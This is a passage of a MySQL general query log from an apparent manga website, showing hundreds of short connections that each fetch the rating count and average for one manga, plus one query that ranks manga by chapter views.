Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330640818 Quit 330640819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330640819 Quit 330640820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330640820 Quit 330640821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330640821 Quit 330640822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330640822 Quit 330640823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330640823 Quit 330640824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330640824 Quit 330640825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330640825 Quit 330640826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330640826 Quit 330640827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330640827 Quit 330640828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330640828 Quit 330640829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330640829 Quit 330640830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330640830 Quit 330640831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330640831 Quit 330640832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330640832 Quit 330640833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330640833 Quit 330640834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330640834 Quit 330640835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330640835 Quit 330640836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330640836 Quit 330640837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330640837 Quit 330640838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330640838 Quit 330640839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330640839 Quit 330640840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330640840 Quit 330640841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330640841 Quit 330640842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330640842 Quit 330640843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330640843 Quit 330640844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330640844 Quit 330640845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330640845 Quit 330640846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330640846 Quit 330640847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330640847 Quit 330640848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330640848 Quit 330640849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330640849 Quit 330640850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330640850 Quit 330640851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330640851 Quit 330640852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330640852 Quit 330640853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330640853 Quit 330640854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330640854 Quit 330640855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330640855 Quit 330640856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330640856 Quit 330640857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330640857 Quit 330640858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330640858 Quit 330640859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330640859 Quit 330640860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330640860 Quit 330640861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330640861 Quit 330640862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330640862 Quit 330640863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330640863 Quit 330640864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330640864 Quit 330640865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330640865 Quit 330640866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330640866 Quit 330640867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330640867 Quit 330640868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330640868 Quit 330640869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330640869 Quit 330640870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330640870 Quit 330640871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330640871 Quit 330640872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330640872 Quit 330640873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330640873 Quit 330640874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330640874 Quit 330640875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330640875 Quit 330640876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330640876 Quit 330640877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330640877 Quit 330640878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330640878 Quit 330640879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330640879 Quit 330640880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330640880 Quit 330640881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330640881 Quit 330640882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330640882 Quit 330640883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330640883 Quit 330640884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330640884 Quit 330640885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330640885 Quit 330640886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330640886 Quit 330640887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330640887 Quit 330640888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330640888 Quit 330640889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330640889 Quit 330640890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330640890 Quit 330640891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330640891 Quit 330640892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330640892 Quit 330640893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330640893 Quit 330640894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330640894 Quit 330640895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330640895 Quit 330640896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330640896 Quit 330640897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330640897 Quit 330640898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330640898 Quit 330640899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330640899 Quit 330640900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330640900 Quit 330640901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330640901 Quit 330640902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330640902 Quit 330640903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330640903 Quit 330640904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330640904 Quit 330640905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330640905 Quit 330640906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330640906 Quit 330640907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330640907 Quit 330640908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330640908 Quit 330640909 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330640909 Quit 330640910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330640910 Quit 330640911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330640911 Quit 330640912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640912 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330640912 Quit 330640913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640913 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330640913 Quit 330640914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640914 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330640914 Quit 330640915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640915 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330640915 Quit 330640916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640916 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330640916 Quit 330640917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640917 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330640917 Quit 330640918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640918 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330640918 Quit 330640919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640919 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330640919 Quit 330640920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640920 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330640920 Quit 330640921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640921 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330640921 Quit 330640922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640922 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330640922 Quit 330640923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640923 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330640923 Quit 330640924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640924 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330640924 Quit 330640925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640925 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330640925 Quit 330640926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640926 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330640926 Quit 330640927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640927 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330640927 Quit 330640928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640928 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330640928 Quit 330640929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640929 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330640929 Quit 330640930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640930 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330640930 Quit 330640931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640931 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330640931 Quit 330640932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640932 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330640932 Quit 330640933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640933 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330640933 Quit 330640934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640934 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330640934 Quit 330640935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640935 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330640935 Quit 330640936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330640936 Quit 330640937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330640937 Quit 330640938 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640938 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330640938 Quit 330640939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640939 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330640939 Quit 330640940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640940 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330640940 Quit 330640941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330640941 Quit 330640942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330640942 Quit 330640943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330640943 Quit 330640944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640944 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330640944 Quit 330640945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330640945 Quit 330640946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640795 Quit 330640946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330640946 Quit 330640947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640948 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330640947 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330640948 Quit 330640949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330640949 Quit 330640950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640950 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330640950 Quit 330640951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330640951 Quit 330640952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330640952 Quit 330640953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330640953 Quit 330640954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640954 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330640954 Quit 330640955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640955 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330640955 Quit 330640956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640956 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330640956 Quit 330640957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640957 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330640957 Quit 330640958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640958 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330640958 Quit 330640959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640959 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330640959 Quit 330640960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640960 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330640960 Quit 330640961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640961 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330640961 Quit 330640962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640962 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330640962 Quit 330640963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640963 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330640963 Quit 330640964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330640964 Quit 330640965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640965 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330640965 Quit 330640966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330640966 Quit 330640967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640967 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330640967 Quit 330640968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330640968 Quit 330640969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640969 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' 